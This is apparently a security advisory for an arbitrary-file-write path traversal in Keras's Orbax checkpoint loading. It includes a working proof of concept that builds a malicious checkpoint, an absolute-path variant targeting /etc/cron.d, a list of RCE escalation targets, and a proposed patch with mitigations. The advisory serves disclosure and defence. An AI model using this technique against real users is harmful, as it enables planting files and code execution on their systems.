You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

[internal-id: KERAS-MFV-001] Arbitrary file write at default keras.saving.load_model via Orbax assets path traversal

Severity: CVSS 3.1 8.6 High (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H). Per-metric justification: AV:L (file delivery; locally readable by the loader); AC:L (default args, no preconditions); PR:N (no privileges required of the attacker); UI:R (the victim must call load_model on the directory); S:C (the write escapes the loader's intended tempfile.TemporaryDirectory() boundary, affecting other security domains); C/I/A:H (arbitrary file write at user privilege chains to RCE-tier outcomes). A network-delivered framing — model directory auto-fetched and loaded by an upstream agent or pipeline — yields AV:N and 9.6 Critical.

CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory — "Path Traversal") plus CWE-73 (External Control of File Name or Path). CWE-22 covers the relative-path (..) escape; CWE-73 covers the orthogonal absolute-path channel that bypasses os.path.join's base entirely.

Affected versions: Keras >= 3.14.0, <= 3.15.0 (HEAD 42b66280e). The Orbax loader was introduced in 40b910383 (#21903, 2026-01-12) and the assets checkpointable path through _write_nested_dict_to_dir in 449818056 (#22099, 2026-02-16). Both first ship in tag v3.14.0; HEAD declares __version__ = "3.15.0" and is still vulnerable.

Component: keras/src/saving/saving_lib.py (sink), keras/src/saving/saving_api.py (caller chain), keras/src/saving/orbax_util.py (auto-detection that opens the chain on default args).

Reporter: Independent security research.

Summary

keras.saving.load_model(filepath) silently dispatches to an Orbax checkpoint loader whenever filepath is a directory whose listing contains a purely-numeric subdirectory (an Orbax "step directory"). The loader extracts an assets checkpointable — an attacker-supplied nested dict[str, dict | np.ndarray] — and feeds it to saving_lib._write_nested_dict_to_dir, which materialises each leaf at os.path.join(base_dir, key) with no validation of the key. Because keys are fully attacker-controlled, both .. traversal ("../../etc/cron.d/evil") and absolute-path overrides ("/etc/cron.d/evil", where os.path.join discards base_dir) write attacker-chosen bytes to attacker-chosen paths at the loader process's privilege.

Any user — or automated pipeline — who calls the default keras.saving.load_model on an attacker-supplied directory loses arbitrary file-write at their own privilege level: a textbook RCE precursor via standard write-then-trigger gadgets.

Impact

  • Arbitrary file write at the loader process's privilege. Each leaf of the malicious assets dict is written with open(child_path, "wb").write(value.tobytes()); both path and bytes are fully attacker-controlled.
  • Both .. traversal and absolute-path keys are accepted. Verified in the PoC. Absolute keys bypass the base dir entirely with no .. segments, defeating naive "look for .." defences.
  • Reachable from the default public APIkeras.saving.load_model("attacker_dir/") suffices. No flag changes, no safe_mode=False, no extra custom_objects=. is_orbax_checkpoint (orbax_util.py:11–47) fires on any directory containing a numeric-named subdirectory, so a trivial mkdir attacker_dir/0 opens the chain.
  • safe_mode=True does not help. safe_mode gates Lambda/object deserialisation deep inside _model_from_config; the assets-write fires on a separate code path that no existing flag mitigates.
  • Standard escalation to RCE. Arbitrary-write-as-user chains via well-known categories — Python sitecustomize.py / .pth on the import path, user crontab / ~/.config/systemd/user/ unit, ~/.bashrc, ~/.ssh/authorized_keys, binary on $PATH. The advisory deliberately does not weaponise any of these.
  • Multi-tenant impact. Model-serving containers and notebook hosts that pass user-controlled paths to load_model (HuggingFace-style "load by repo id" agents, MLOps "import this checkpoint" flows) hand the uploading party arbitrary-write inside the serving process.

Affected Versions

  • First vulnerable release: Keras 3.14.0 (commits 40b910383 + 449818056, both first present at tag v3.14.0; verified with git merge-base --is-ancestor).
  • Last vulnerable release at time of writing: Keras 3.15.0 (HEAD 42b66280e). _write_nested_dict_to_dir is unchanged since introduction.
  • Reproduction confirmed at: HEAD 42b66280e (Phase 1 unit-level + Phase 2 reachability via keras.saving.load_model).

Pre-3.14 releases do not contain the Orbax loader and are not affected.

Vulnerability Details

Root cause

keras/src/saving/saving_lib.py:1776–1790:

def _write_nested_dict_to_dir(tree, base_dir):
    """Recursively write a nested dict of numpy arrays to a directory tree.

    Each dict key becomes a directory or filename. Leaf values (numpy
    arrays) are written as binary files.
    """
    for key, value in tree.items():
        child_path = os.path.join(base_dir, key)
        if isinstance(value, dict):
            os.makedirs(child_path, exist_ok=True)
            _write_nested_dict_to_dir(value, child_path)
        elif isinstance(value, np.ndarray):
            os.makedirs(os.path.dirname(child_path), exist_ok=True)
            with open(child_path, "wb") as f:
                f.write(value.tobytes())

The bug is that key is assumed to be a single path component (a "filename", per the docstring) but never enforced to be one. Three invariants fail simultaneously: (1) os.path.join(base_dir, key) returns key verbatim when key is absolute; (2) .. segments in key resolve child_path outside base_dir; (3) os.makedirs(os.path.dirname(child_path), exist_ok=True) happily creates intermediate directories along the escaped path. The save-side docstring at _save_assets_to_dict (saving_lib.py:1804–1806) ironically advertises the nested-dict representation as one that "avoids platform-specific path separator issues and zip-slip vulnerabilities" — precisely the class that exists on the load side, because the load side never re-validates.

Caller chain (reachability from public API)

  1. keras.saving.load_model(filepath) (re-exported as keras.models.load_model) — saving_api.py:181+.
  2. saving_api.py:202–209if is_orbax_checkpoint(filepath): return _load_model_from_orbax_checkpoint(filepath, ...). No flag changes required.
  3. orbax_util.py:11–47is_orbax_checkpoint returns True for any directory whose listing contains a digit-named subdirectory or any of the markers orbax.checkpoint, pytree.orbax-checkpoint, checkpoint_metadata, .orbax-checkpoint-tmp. The attacker owns the directory, so mkdir attacker_dir/0 is enough.
  4. saving_api.py:363–445_load_model_from_orbax_checkpoint opens the checkpoint via ocp.training.Checkpointer and requests pytree, model_config, and (when present) assets (line 426–427: if "assets" in saved_keys: request["assets"] = None).
  5. saving_api.py:443saving_lib._load_assets_from_dict(model, assets_data) is called with the unvalidated nested dict round-tripped through Orbax storage.
  6. saving_lib.py:1856–1860_load_assets_from_dict allocates a tempfile.TemporaryDirectory() and immediately calls _write_nested_dict_to_dir(assets_dict, tmp_dir). The vulnerability fires here, before the tempdir is read back.

grep -rn _load_assets_from_dict keras/ shows exactly one caller; patching at the sink closes the path.

Why safe_mode does not protect

safe_mode=True is the Keras knob for refusing untrusted Lambda layers and untrusted __class__ references during config deserialisation; that gate lives inside _model_from_config / deserialize_keras_object, called by _load_model_from_orbax_checkpoint at saving_api.py:413. The arbitrary file write happens at saving_api.py:443, on a sibling code path. The check is structurally below the gate — flipping safe_mode either way has no effect.

Proof of Concept

The PoC at /home/zitu/mfv/poc/T1B/ reproduces the bug end-to-end in a sealed docker container, writing only a benign sentinel file (poc-marker-T1B-reach).

Environment

Docker image keras-poc:t1b (Python 3.11 + jax-cpu + numpy + orbax-checkpoint 0.11.x + h5py). Keras source mounted read-only at /keras-src; PoC volume mounted at /poc.

Build malicious artifact

/home/zitu/mfv/poc/T1B/run.py --build-only writes a real Orbax checkpoint whose assets checkpointable carries a path-traversal key. The essential payload:

import numpy as np, keras
from orbax.checkpoint import v1 as ocp
from keras.src.saving import saving_lib

model = keras.Sequential(
    [keras.layers.Input(shape=(2,)), keras.layers.Dense(2)]
)
model.compile(optimizer="adam", loss="mse")
model.fit(np.zeros((1, 2)), np.zeros((1, 2)), epochs=1, verbose=0)
config_json, _ = saving_lib._serialize_model_as_json(model)

# Poisoned key escapes the tempfile.TemporaryDirectory() (e.g. /tmp/tmpXXXX).
malicious_assets = {
    "../../poc/poc-marker-T1B-reach": np.array(
        [0x52, 0x45, 0x41, 0x43, 0x48, 0x0A], dtype=np.uint8  # "REACH\n"
    )
}
payload = {
    "pytree": model.get_state_tree(),
    "model_config": {"config": config_json},
    "assets": malicious_assets,
}

checkpointer = ocp.training.Checkpointer(directory="/poc/evil_orbax")
with ocp.Context():
    checkpointer.save_checkpointables(0, payload)
checkpointer.wait_until_finished(); checkpointer.close()

The malicious dict round-trips through Orbax CompositeCheckpointHandler without sanitisation (key preserved verbatim in _strings.json on disk). An equally effective variant uses an absolute-path key ({"/etc/cron.d/evil": np.array([...], dtype=np.uint8)}) — os.path.join drops the base dir, no .. involved (the CWE-73 channel).

Trigger

docker run --rm --user $(id -u):$(id -g) \
    -v /home/zitu/mfv/keras:/keras-src:ro \
    -v /home/zitu/mfv/poc/T1B:/poc \
    -e PYTHONPATH=/keras-src -e KERAS_BACKEND=jax -e HOME=/tmp \
    keras-poc:t1b python /poc/run.py

Inside the container the PoC then runs keras.saving.load_model("/poc/evil_orbax") with all default arguments.

Expected evidence

calling _write_nested_dict_to_dir with key '../poc-marker-T1B-unit'
  base_dir = '/poc/sandbox'
  /poc/ contents:
    FILE /poc/poc-marker-T1B-unit  (4 bytes)
    DIR  /poc/sandbox
  /poc/sandbox/ contents: (empty)
[Phase 1] CONFIRMED: file landed OUTSIDE base_dir at /poc/poc-marker-T1B-unit
  contents = b'POC\n'
...
  saved evil orbax checkpoint at /poc/evil_orbax
  invoking keras.saving.load_model() on the evil checkpoint…
  load_model() returned without raising
  /poc/ contents after load_model():
    FILE /poc/poc-marker-T1B-reach  (6 bytes)
[Phase 2] REACHABLE: marker landed OUTSIDE the load tmpdir at /poc/poc-marker-T1B-reach
  contents = b'REACH\n'

load_model() returns successfully (the model object is even usable); the side effect is silent.

Suggested Patch

Fix at the sink. Validate every key as a single well-formed path component, then realpath-check the resolved child path. Complete diff against keras/src/saving/saving_lib.py at HEAD 42b66280e (validated with git apply --check):

--- a/keras/src/saving/saving_lib.py
+++ b/keras/src/saving/saving_lib.py
@@ -1773,18 +1773,62 @@ def _split_path_components(path):
     return parts
 
 
+def _is_safe_assets_key(key):
+    """Return True iff ``key`` is a single safe pathname component.
+
+    Rejects empty strings, ``.``/``..`` segments, absolute paths, embedded
+    path separators (POSIX or Windows), and NUL bytes. The intent is that
+    each ``key`` in an assets nested-dict be a *filename*, never a path.
+    """
+    if not isinstance(key, str) or not key:
+        return False
+    if "\x00" in key:
+        return False
+    if os.path.isabs(key):
+        return False
+    # Disallow any path separator on either platform, plus drive letters
+    # of the form "C:..." which Windows treats specially in os.path.join.
+    if "/" in key or "\\" in key:
+        return False
+    if len(key) >= 2 and key[1] == ":":
+        return False
+    if key in (".", ".."):
+        return False
+    return True
+
+
 def _write_nested_dict_to_dir(tree, base_dir):
     """Recursively write a nested dict of numpy arrays to a directory tree.
 
     Each dict key becomes a directory or filename. Leaf values (numpy
     arrays) are written as binary files.
+
+    Keys are validated to be single safe filename components: keys
+    containing path separators, ``..`` segments, drive letters, NUL
+    bytes, or absolute paths are rejected. As defence-in-depth the
+    resolved child path is also required to stay under ``base_dir``.
     """
+    base_dir_real = os.path.realpath(base_dir)
     for key, value in tree.items():
+        if not _is_safe_assets_key(key):
+            raise ValueError(
+                f"Unsafe key in assets dict: {key!r}. Asset keys must be "
+                "single filename components without separators or "
+                "traversal segments."
+            )
         child_path = os.path.join(base_dir, key)
+        child_real = os.path.realpath(child_path)
+        if child_real != base_dir_real and not child_real.startswith(
+            base_dir_real + os.sep
+        ):
+            raise ValueError(
+                f"Path escape in assets dict: {key!r} resolves to "
+                f"{child_real!r} which is outside {base_dir_real!r}."
+            )
         if isinstance(value, dict):
             os.makedirs(child_path, exist_ok=True)
             _write_nested_dict_to_dir(value, child_path)
         elif isinstance(value, np.ndarray):
             os.makedirs(os.path.dirname(child_path), exist_ok=True)
             with open(child_path, "wb") as f:
                 f.write(value.tobytes())

Notes for the patch reviewer:

  • The validator rejects POSIX/Windows separators, drive letters, NUL, absolute paths, and ./... Legitimate assets produced by _save_assets_to_dict (saving_lib.py:1793–1841) are structurally guaranteed not to contain any of these — they come from _split_path_components(os.path.relpath(...)) on a directory walk — so round-tripping a Keras-produced checkpoint is a no-op.
  • The realpath check is defence-in-depth against future call sites or symlink races; redundant but cheap on the current site.
  • ValueError matches surrounding Keras style. Add a test in saving_lib_test.py that pins pytest.raises(ValueError) for keys ("../escape", "/etc/passwd", "a/b", "..", ".", "x\x00y").

Mitigations (interim)

For users who cannot upgrade once a fixed Keras is published:

  • Do not pass untrusted directories to keras.saving.load_model. The Orbax detection fires on any directory with a numeric-named subdirectory, so attacker-supplied "model folders" trigger the path even when they don't look like Orbax checkpoints.
  • Sandbox the loader process under bubblewrap / firejail / a rootless container with a read-only rootfs, or a seccomp filter that denies openat(O_CREAT) outside the model staging directory.
  • Validate the assets sub-tree before loading: open the checkpoint via orbax-checkpoint directly, audit the assets dict's keys (reject empty, .., /, \\, NUL, :, absolute), then delegate to keras.saving.load_model only when clean.
  • Pin Keras to < 3.14.0 if downgrading is acceptable; removes the entire affected code path.

Credits

Reported by Independent security research (academic vulnerability research project, NTU, contact ziyu.lin@ntu.edu.sg), 2026-05-04.

Timeline

  • 2026-05-04: Vulnerability discovered; primitive confirmed at _write_nested_dict_to_dir; reachability via keras.saving.load_model confirmed end-to-end inside docker; absolute-path variant confirmed.
  • TBD: Reported privately to keras-security@google.com and via GHSA private vulnerability report against keras-team/keras.
  • TBD: Patch released and CVE assigned.
  • TBD: 90-day public disclosure.

References

  • CWE-22 — Path Traversal: https://cwe.mitre.org/data/definitions/22.html
  • CWE-73 — External Control of File Name or Path: https://cwe.mitre.org/data/definitions/73.html
  • Commit introducing the Orbax loader: 40b910383 ("Orbax Loading and Sharding Support feature (#21903)").
  • Commit introducing the assets dict path: 449818056 ("Add assets support to OrbaxCheckpoint using checkpointables API (#22099)").
  • Related (different class, same component family): CVE-2026-1669 (Keras H5 external dataset file-read). The H5 advisory describes a read primitive; this advisory describes a write primitive in a sibling code path.
  • Bug-class precedent: "Zip Slip" disclosure (Snyk, 2018); CVE-2007-4559 (Python tarfile traversal).
Downloads last month
-
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support